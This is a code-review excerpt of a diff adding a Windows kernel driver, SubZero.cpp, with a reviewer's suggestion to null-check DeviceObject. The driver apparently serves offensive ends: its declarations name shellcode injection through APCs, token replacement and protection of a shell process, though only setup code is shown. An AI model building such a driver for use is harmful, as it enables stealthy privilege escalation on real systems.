Project/SubZeroDriver/SubZero.cpp

```diff
@@ -0,0 +1,456 @@
+#include "pch.h"
+#include "SubZero.h"
+
+Globals g_Globals;
+DRIVER_UNLOAD SubZeroUnload;
+DRIVER_DISPATCH SubZeroCreateClose;
+NTSTATUS OnRegistryNotify(PVOID CallbackContext, PVOID Argument1, PVOID Argument2);
+OB_PREOP_CALLBACK_STATUS OnPreOpenProcess(PVOID RegistrationContext, POB_PRE_OPERATION_INFORMATION Info);
+void OnProcessNotify(PEPROCESS Process, HANDLE ProcessId, PPS_CREATE_NOTIFY_INFO CreateInfo);
+void OnThreadNotify(HANDLE ProcessId, HANDLE ThreadId, BOOLEAN Create);
+void InjectUsermodeShellcodeAPC(unsigned char* Shellcode, SIZE_T ShellcodeSize);
+bool FindProcessByName(CHAR* Name, PEPROCESS* Process);
+bool QueueAPC(PKTHREAD thread, KPROCESSOR_MODE mode, PKNORMAL_ROUTINE apcFunction);
+void ReplaceToken(PEPROCESS Process, PACCESS_TOKEN Token);
+
+extern "C" NTSTATUS
+DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING) {
+	KdPrint((DRIVER_PREFIX "[+] Driver was loaded\n"));
+
+	UNICODE_STRING altitude = RTL_CONSTANT_STRING(L"12345.6171");
+
+	// Build registration structures for shell Process' protection
+	OB_OPERATION_REGISTRATION operations[] = {
+		{
+			PsProcessType,		        // object type
+			OB_OPERATION_HANDLE_CREATE | OB_OPERATION_HANDLE_DUPLICATE,
+			OnPreOpenProcess, nullptr	// pre, post
+		}
+	};
+	OB_CALLBACK_REGISTRATION reg = {
+		OB_FLT_REGISTRATION_VERSION,
+		1,										// operation count
+		altitude,		// altitude
+		nullptr,							    // context
+		operations
+	};
+
+	auto status = STATUS_SUCCESS;
+	PDEVICE_OBJECT DeviceObject = nullptr;
+	UNICODE_STRING symLink = RTL_CONSTANT_STRING(L"\\??\\" DRIVER_NAME);
+	UNICODE_STRING devName = RTL_CONSTANT_STRING(L"\\Device\\" DRIVER_NAME);
+	bool symLinkCreated = false;
+
+	do {
+		status = ::IoCreateDevice(DriverObject, 0, &devName,
+			FILE_DEVICE_UNKNOWN, 0, TRUE, &DeviceObject);
+		if (!NT_SUCCESS(status)) {
+			KdPrint((DRIVER_PREFIX "[-] Failed to create device (status=0x%08X)\n",status));
+			break;
+		}
+		DeviceObject->Flags |= DO_DIRECT_IO;
```

Comment:
In user-mode code you should check this pointer before accessing it's members.
So in my opinion, in kernel-mode you should take extra precautions.
Probably I would add: 
```
if(nullptr != DeviceObject)
{
    DeviceObject->Flags |= DO_DIRECT_IO;
}
else
{  
   break;
}
```